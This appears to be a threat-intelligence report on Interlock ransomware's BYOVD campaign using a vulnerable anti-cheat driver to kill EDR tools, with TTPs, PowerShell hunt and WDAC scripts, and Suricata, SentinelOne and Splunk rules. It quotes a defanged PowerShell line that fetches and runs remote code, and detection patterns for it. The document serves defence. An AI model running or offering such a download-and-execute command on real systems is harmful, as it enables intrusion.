Interlock Ransomware "Hotta Killer" BYOVD Campaign
BLUF
Interlock ransomware operators are using a Bring Your Own Vulnerable Driver (BYOVD) technique to disable EDR tools, with reported victims in the automotive and manufacturing sectors. The operators bring a signed anti-cheat kernel driver affected by CVE-2025-61155 (described as a zero-day at the time of the campaign), register it as a kernel service and use it to terminate protected EDR/AV processes from kernel mode. Note that the CVE's CVSS vector rates availability impact only, which is consistent with a process-kill primitive rather than full kernel code execution; the driver is a tool the attacker loads after initial access, not something already present on the victim.
Executive Cost Summary
This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.
“For organizations affected by Interlock ransomware campaigns leveraging BYOVD techniques to disable endpoint defenses and deploy encryption-based extortion…”
· Low-end total cost: $750K – $2.5M
o (rapid containment, limited encryption scope, minimal regulatory exposure)
· Typical expected range: $3M – $12M
o (enterprise-wide response, downtime across manufacturing operations, extortion pressure)
· Upper-bound realistic scenarios: $15M – $35M
o (multi-site disruption, prolonged recovery, legal escalation, customer fallout)
Key Cost Drivers
· Duration of operational shutdown in manufacturing/automotive environments
· Extent of endpoint security impairment from kernel-level driver abuse
· Scale of forensic restoration across servers, OT, and endpoints
· Ransom negotiation, payment considerations, and recovery complexity
· Regulatory notification requirements if sensitive data is accessed
· Long-term customer and supplier confidence impacts
Targeted Sectors
· Manufacturing
· Automotive
· Healthcare
Targeted Countries
· Global
o U.S.
o Europe
First Reported Activity
· Feb 4, 2026
Last Reported Update
· Feb 5, 2026
APT
· This activity has not been associated with an APT group
Criminal Group
· Interlock Ransomware
CVE-2025-61155
Zero-day in Anti-Cheat driver
CVSS 3.1
· (5.5) AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Nessus ID
· Not applicable
Is this on the KEV list?
· No
Mitigation
· Remove/disable the vulnerable driver where present: stop and delete the kernel service, and keep the .sys file for hashing and forensic submission rather than wiping it.
· Block the driver by hash, original file name or signer using WDAC (App Control for Business). AppLocker has no driver rule collection and cannot block kernel drivers, so it is not a substitute. Keep Microsoft's recommended driver block rules in force (enforced when HVCI or Smart App Control is on).
· Monitor for, and prevent, kernel-driver service creation whose image path lies outside the Windows driver directories, in particular user-writable or removable locations (the observed drop path is E:\UpdateCheckerX64.sys).
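The following is an added example of the second mitigation step, written for this page rather than taken from Fortinet, CyberDax or any vendor tooling. It turns a quarantined copy of the driver into a WDAC hash-level deny rule and merges it into an existing base policy using the ConfigCI cmdlets. The three paths are assumptions; the quarantined file is needed because Hash rules are computed from the binary itself.

```powershell
# Added example (not from the report or its sources): build a WDAC hash deny rule for a
# quarantined copy of the driver and merge it into an existing base policy.
# Assumptions: the three paths below; ConfigCI module present (Windows 10/11, Server 2016+);
# the base policy uses the multiple-policy format (has a <PolicyID> element).
#Requires -RunAsAdministrator
param(
    [string]$DriverPath = 'C:\Quarantine\UpdateCheckerX64.sys',   # quarantined driver copy
    [string]$BasePolicy = 'C:\WDAC\BasePolicy.xml',                # current base policy XML
    [string]$MergedXml  = 'C:\WDAC\BasePolicy.merged.xml'          # output XML
)

# A Hash-level deny matches this exact build regardless of file name, drop path or its
# (valid) signature, so renaming the file or moving it off E:\ does not evade it.
# A Publisher-level deny would also block every other driver from the same signer,
# which is usually broader than you want for an anti-cheat vendor.
$deny   = New-CIPolicyRule -Level Hash -DriverFilePath $DriverPath -Deny
$sha256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $DriverPath).Hash

# Deny rules take precedence over allow rules when WDAC evaluates a policy.
Merge-CIPolicy -PolicyPaths $BasePolicy -Rules $deny -OutputFilePath $MergedXml | Out-Null

# Compile to binary. Multiple-policy-format binaries must be named {PolicyID}.cip and
# deployed to %SystemRoot%\System32\CodeIntegrity\CiPolicies\Active (or via Intune/GPO),
# followed by a reboot, or "CiTool --refresh" on Windows 11 22H2 and later.
$policyId = ([xml](Get-Content -LiteralPath $MergedXml -Raw)).SiPolicy.PolicyID
if (-not $policyId) { throw "No <PolicyID> in $MergedXml; legacy single-policy format is not handled here" }
$cip = Join-Path (Split-Path -Parent $MergedXml) "$policyId.cip"
ConvertFrom-CIPolicy -XmlFilePath $MergedXml -BinaryFilePath $cip | Out-Null

Write-Host "Hash deny for $DriverPath (SHA-256 $sha256) written to $cip"
```

Test the merged policy in audit mode first (rule option 3, Enabled:Audit Mode) and review Code Integrity event 3076/3077 before enforcing, since a mis-scoped deny on a driver can prevent a machine from booting.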
Malware Names
· Interlock Ransomware
Malware sample
sha256
5c5598f7fb5bab3e2c18216764dbbff019f7f19d3801083e8fbf638ba02c6bca
Malware Family
· Derived from or sharing codebase with the Rhysida family. It operates as a closed group rather than a standard RaaS model.
Known Decryption Key
None currently available. Decryption requires a unique 60-character company ID and negotiation with the threat actors.
Verdict
Highly Malicious
Primary Objectives
· Disable defenses
· Sustain access
· Deploy ransomware for encryption/extortion
Behavior Analysis
Driver drop + kernel service creation
· Drop location example: E:\UpdateCheckerX64.sys
· Service name pattern: UpdateCheckerX64_{random-numbers}
· Indicative Windows APIs: OpenSCManagerW, CreateServiceW, StartServiceW (the driver is registered as a service of type SERVICE_KERNEL_DRIVER; StartServiceW is what actually loads it into the kernel)
Initial execution pattern
· A PowerShell one-liner of the form iex $(irm http://<ip>:8080/<epoch_time_rounded>) (URL defanged in the Fortinet write-up). The URI path is a rounded Unix timestamp, so it changes between runs and should be matched by shape (a 9-10 digit path on port 8080) rather than by value.
Node runtime staging
· Download.zip containing node.exe + malicious .log JavaScript payload executed by Node.
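Below is an added hunt script written for this page; it is not code from Fortinet, CyberDax or Interlock tooling. It covers the driver drop and service-creation behaviour described above and the monitoring mitigation listed earlier: it enumerates every kernel-driver service on the host, flags those whose name matches UpdateCheckerX64_<n>, whose file name matches the names used in the rules section below, whose image lives outside the Windows driver directories, or whose SHA-256 is on a list you supply, then replays the same checks over System 7045 service-install events so drivers the attacker has already deleted still surface. The trusted-directory list, the 30-day window and the empty hash list are assumptions to tune.

```powershell
# Added hunt script (not code from Fortinet or the CyberDax report). Flags kernel-driver
# services that look like the Interlock BYOVD drop and replays the checks over 7045 events.
# Assumptions: $TrustedDirs, the $Days window, and $KnownBadHashes (empty here on purpose;
# populate it with SHA-256 values of driver builds you have confirmed as the abused one).
#Requires -RunAsAdministrator
param(
    [string[]]$KnownBadHashes = @(),   # SHA-256 of confirmed-bad driver builds
    [int]$Days = 30,                   # how far back to read 7045 service-install events
    [switch]$Remove                    # stop+delete services whose NAME matches the pattern
)

$TrustedDirs  = @("$env:SystemRoot\System32\drivers", "$env:SystemRoot\System32\DriverStore")
$BadNameRegex = '^UpdateCheckerX64(_\d+)?$'                     # pattern from Behavior Analysis
$BadFileNames = @('UpdateCheckerX64.sys', 'GameDriverX64.sys')  # file names used in the rules below

function Resolve-ImagePath {
    param([string]$Raw)
    # ImagePath values come as \??\E:\x.sys, \SystemRoot\System32\..., System32\drivers\x.sys
    # or a quoted full path; normalise to a plain Win32 path so it can be hashed and sign-checked.
    $p = $Raw.Trim('"')
    $p = $p -replace '^\\\?\?\\', ''
    $p = $p -replace '^\\SystemRoot\\', ($env:SystemRoot + '\')
    if ($p -match '^System32\\') { $p = Join-Path $env:SystemRoot $p }
    return [Environment]::ExpandEnvironmentVariables($p)
}

function Test-TrustedPath {
    param([string]$Path)
    foreach ($d in $TrustedDirs) {
        if ($Path.StartsWith($d, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Test-KernelDriver {
    # One finding per kernel-driver service; Reasons is empty when nothing looks wrong.
    param([string]$Name, [string]$ImagePath)
    $reasons = New-Object System.Collections.Generic.List[string]
    if ($Name -match $BadNameRegex) { $reasons.Add('service name matches UpdateCheckerX64_<n>') }
    if ($BadFileNames -contains (Split-Path -Leaf $ImagePath)) { $reasons.Add('known driver file name') }
    if (-not (Test-TrustedPath $ImagePath)) { $reasons.Add('image outside Windows driver directories') }
    $hash = $null; $sig = 'file missing'
    if (Test-Path -LiteralPath $ImagePath -PathType Leaf) {
        $hash = (Get-FileHash -LiteralPath $ImagePath -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature -LiteralPath $ImagePath).Status
        # A BYOVD driver is normally validly signed, so 'Valid' clears nothing; a hash match
        # against a confirmed-bad build is the only conclusive check in this script.
        if ($KnownBadHashes -contains $hash) { $reasons.Add('SHA-256 matches confirmed-bad build') }
    } else {
        $reasons.Add('image file missing (removable media unplugged or already deleted?)')
    }
    [pscustomobject]@{ Service = $Name; ImagePath = $ImagePath; Signature = $sig
                       Sha256 = $hash; Reasons = $reasons }
}

# 1. Current state: every service of Type 1 (SERVICE_KERNEL_DRIVER) or 2 (file-system driver).
$findings = foreach ($svc in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services') {
    $p = Get-ItemProperty -LiteralPath $svc.PSPath -ErrorAction SilentlyContinue
    if (($p.Type -ne 1 -and $p.Type -ne 2) -or -not $p.ImagePath) { continue }
    $f = Test-KernelDriver -Name $svc.PSChildName -ImagePath (Resolve-ImagePath $p.ImagePath)
    if ($f.Reasons.Count -gt 0) { $f }
}
$findings | Sort-Object { $_.Reasons.Count } -Descending |
    Format-Table Service, Signature, Sha256, ImagePath, @{n='Reasons'; e={ $_.Reasons -join '; ' }} -AutoSize

# 2. History: System 7045 (Service Control Manager) records every service install, including
#    drivers since deleted. Property order follows the event message:
#    0 ServiceName, 1 ImagePath, 2 ServiceType, 3 StartType, 4 AccountName.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
    Where-Object { $_.Properties[2].Value -like '*kernel*' } |
    ForEach-Object {
        $f = Test-KernelDriver -Name $_.Properties[0].Value -ImagePath (Resolve-ImagePath $_.Properties[1].Value)
        if ($f.Reasons.Count -gt 0) {
            $f | Add-Member -NotePropertyName Installed -NotePropertyValue $_.TimeCreated -PassThru
        }
    } | Format-Table Installed, Service, ImagePath, @{n='Reasons'; e={ $_.Reasons -join '; ' }} -AutoSize

# 3. Optional cleanup, limited to services whose name matches the campaign pattern. The .sys
#    file is deliberately left on disk so it can be hashed and submitted for analysis.
if ($Remove) {
    foreach ($f in $findings | Where-Object { $_.Service -match $BadNameRegex }) {
        sc.exe stop   $f.Service | Out-Null
        sc.exe delete $f.Service | Out-Null
        Write-Host "Removed kernel-driver service $($f.Service) ($($f.ImagePath))"
    }
}
```

Treat "image outside Windows driver directories" on its own as a triage lead, not a verdict: legitimate third-party drivers are sometimes loaded from Program Files. The name and hash matches are the strong signals, and a driver that sits on a removable drive letter with a numeric service suffix matches the observed tradecraft closely enough to isolate the host while the file is hashed.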
TTPs
Initial Access
· T1566.001 Phishing: Spearphishing Attachment
o Common MintLoader delivery pattern (Fortinet describes MintLoader-origin compromise but not the exact lure; include as a likely mapping when MintLoader is involved).
· T1204 User Execution
o User runs/permits execution leading to MintLoader/PowerShell chain.
Execution
· T1059.001 Command and Scripting Interpreter PowerShell
o PowerShell downloads and executes remote payload.
· T1059.007 JavaScript
o Malicious JS executed via Node.js runtime.
Defense Evasion / Privilege Enablement
· T1562.001 Impair Defenses Disable or Modify Tools
o Process-killing tool attempts to terminate EDR/AV processes by abusing the vulnerable signed driver.
· T1211 Exploitation for Defense Evasion
o Leveraging a vulnerable (but signed) driver to gain kernel-mediated capability to kill protected processes (effectively bypassing user-mode protections).
Persistence / System Modification
· T1543.003 Create or Modify System Process Windows Service
o APIs used to create/start a service for a kernel driver (CreateServiceW/StartServiceW).
Lateral Movement / Remote Services
· T1021.004 Remote Services SSH
o Lateral movement to a Nutanix system over SSH (Fortinet).
Impact
· T1486 Data Encrypted for Impact
o Ransomware encryption/extortion.
Suggested Rules / potential hunts
As a reminder, these are indicator rules and are likely to be noisy.
For best results, build them into a data model and review the matches as a report rather than alerting on every individual hit.
Suricata
· Detect the PowerShell download pattern: a GET to port 8080 whose entire URI is a 9-10 digit epoch value (tune for your environment; if your sample used the default Invoke-RestMethod agent, adding a user-agent match on "PowerShell" cuts noise further):
alert http $HOME_NET any -> $EXTERNAL_NET 8080 (
msg:"SUSPECT PowerShell IEX IRM epoch-path (MintLoader/Interlock staging)";
flow:to_server,established;
http.method; content:"GET"; nocase;
http.uri; pcre:"/^\/\d{9,10}$/";
classtype:trojan-activity;
sid:2506115501; rev:2;
)
· Detect the driver filename in HTTP and SMB file transfers (file.name is checked in both directions, so the download to the victim and any later SMB copy between hosts both match):
alert http any any -> any any (
msg:"SUSPECT HTTP transfer of UpdateCheckerX64.sys (Interlock BYOVD driver)";
flow:established;
file.name; content:"UpdateCheckerX64.sys"; nocase;
classtype:trojan-activity;
sid:2506115502; rev:2;
)
alert smb any any -> any any (
msg:"SUSPECT SMB transfer of UpdateCheckerX64.sys (Interlock BYOVD driver)";
flow:established;
file.name; content:"UpdateCheckerX64.sys"; nocase;
classtype:trojan-activity;
sid:2506115503; rev:1;
)
SentinelOne
· Kernel driver service creation pattern
EventType = "Process Creation"
AND (ProcessName In ("sc.exe","powershell.exe","cmd.exe") OR ProcessCmdLine Contains "CreateService")
AND ProcessCmdLine Contains "UpdateCheckerX64"
· Driver file write (creation or modification of either known file name, wherever it lands)
EventType In ("File Creation","File Modification")
AND (TargetFilePath EndsWith "\\UpdateCheckerX64.sys" OR TargetFilePath EndsWith "\\GameDriverX64.sys")
Splunk
· Windows service install for kernel drivers (Security 4697 and System 7045 are the usual sources; adjust indexes/sourcetypes, and note that classic-rendered events expose Service_Name/Service_File_Name where XML-rendered ones expose ServiceName/ServiceFileName):
(index=wineventlog (EventCode=4697 OR EventCode=7045))
AND (ServiceName="UpdateCheckerX64*" OR ServiceFileName="*UpdateCheckerX64.sys*" OR ServiceFileName="*GameDriverX64.sys*")
| stats earliest(_time) as firstSeen latest(_time) as lastSeen values(ServiceName) values(ServiceFileName) values(user) by host
| convert ctime(firstSeen) ctime(lastSeen)
· Suspicious PowerShell epoch URL pattern (4688 carries CommandLine only when "Include command line in process creation events" is enabled; Sysmon Event 1 or PowerShell 4104 script-block logs are alternatives; word boundaries on iex/irm avoid matching words such as "confirm"):
index=wineventlog EventCode=4688 (NewProcessName="*\\powershell.exe" OR NewProcessName="*\\pwsh.exe")
| eval cmd=lower(CommandLine)
| where match(cmd,"\\biex\\b") AND match(cmd,"\\birm\\b") AND match(cmd,":8080/\\d{9,10}")
| stats earliest(_time) as firstSeen latest(_time) as lastSeen values(CommandLine) by host AccountName
| convert ctime(firstSeen) ctime(lastSeen)
Delivery Method
· Initial access via a MintLoader-origin compromise and PowerShell download chain (see TTPs). The vulnerable driver is not already present on victims; the operator brings it in, drops it (observed on E:\), registers it as a kernel service and uses it to kill EDR/AV processes before encryption (BYOVD).
References
NVD
· hxxps://nvd.nist.gov/vuln/detail/CVE-2025-61155
GitHub
· hxxps://github.com/advisories/GHSA-9qfv-m6w2-fhch
Fortinet
· hxxps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks
VirusTotal
· hxxps://www.virustotal.com/gui/file/a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642/details
ArcticWolf
· hxxps://arcticwolf.com/resources/blog/threat-actor-profile-interlock-ransomware/
FortiGuard
· hxxps://www.fortinet.com/blog/threat-research/ransomware-roundup-interlock